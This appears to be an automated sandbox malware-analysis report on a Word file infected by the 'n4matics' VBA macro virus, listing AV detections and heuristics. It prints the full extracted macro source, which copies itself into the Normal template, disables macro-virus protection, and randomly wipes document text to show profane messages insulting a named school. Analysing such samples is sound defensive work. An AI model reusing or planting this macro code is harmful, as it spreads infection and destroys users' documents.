MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains legacy WordBasic macro markers and a VBA Auto_Close macro, indicating a malicious intent to spread. The embedded VBA script explicitly states 'n4matics virus' and attempts to export and import its code to the NormalTemplate, suggesting a self-replicating mechanism. The ClamAV detection further confirms its malicious nature as Win.Trojan.Pivis-2.
Heuristics 5
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3361 bytes |
SHA-256: 9c5920f50a286572ac8e715757ee6214c54e6f7935dffe5f6ca796dcbf44f8d0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Intruded-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "n4matics"
'name: n4matics virus
'author: ppacket
'date: feb 08 2k1
Private Sub infect()
On Error Resume Next
Dim Nactive, Aactive As Boolean
WordBasic.DisableAutoMacros 0
With Application
.UserName = "ppacket"
.DisplayStatusBar = False
.ScreenUpdating = False
End With
With Dialogs(wdDialogFileSummaryInfo)
.Author = "ppacket"
.Comments = "shit 2 all d students n staff of informatics sm fairview" & vbCr & _
"fuck you all"
.Title = "ppacket's time to shine: informatics virus"
.Execute
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
With ActiveDocument
.ReadOnlyRecommended = False
End With
Set NTI = NormalTemplate.VBProject.VBComponents
Set ADI = ActiveDocument.VBProject.VBComponents
If NTI.Item("n4matics").Name <> "n4matics" Then
ADI("n4matics").export "c:\n4mat.ics"
Nactive = True
ElseIf ADI.Item("n4matics").Name <> "n4matics" Then
NTI("n4matics").export "c:\n4mat.ics"
Aactive = True
End If
If Nactive Then
NTI.import "c:\n4mat.ics"
NormalTemplate.Save
ElseIf Aactive Then
ADI.import "c:\n4mat.ics"
ActiveDocument.Save
End If
Kill ("c:\n4mat.ics")
Randomize
trigger = shit & damn & Int((66 * Rnd) + 1)
If trigger = 26 Then
Call Payback
End If
End Sub
Sub AutoClose()
On Error Resume Next
Call infect
If opendocument.Saved = False Then
opendocument.SaveAs FileName:=ActiveDocument.FullName
End If
ActiveDocument.Close savechanges = wdSaveChanges
End Sub
Private Sub Payback()
On Error Resume Next
Randomize
trigger = shit & damn & Int((99 * Rnd) + 1)
If trigger = 10 Then
Selection.WholeStory
Selection.Delete unit:=wdCharacter, Count:=1
With Selection.Font
.Name = Arial
.ColorIndex = wdGray50
.Animation = wdAnimationShimmer
.Size = 26
.Position = center
End With
Selection.InsertBefore "Hehehehehehehehehehe" & vbCr & _
"You've been intruded" & vbCr & _
"By n4matics virus!!!"
If ActiveDocument.Saved = False Then
ActiveDocument.Save
End If
End If
With Assistant
.Visible = True
.MoveWhenInTheWay = True
.Animation = msoAnimationGetArtsy
.Left = trigger
.Visible = True
End With
With Assistant.NewBalloon
.Icon = msoCritical
.Heading = "n4matics Virus"
.Text = "You've been intruded by" & vbCr & _
" those fucking ppl @ " & vbCr & _
"informatics SM fairview"
.Show
End With
End Sub
Sub toolsmacro()
Call Payback
End Sub
Sub viewvbcode()
Call Payback
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.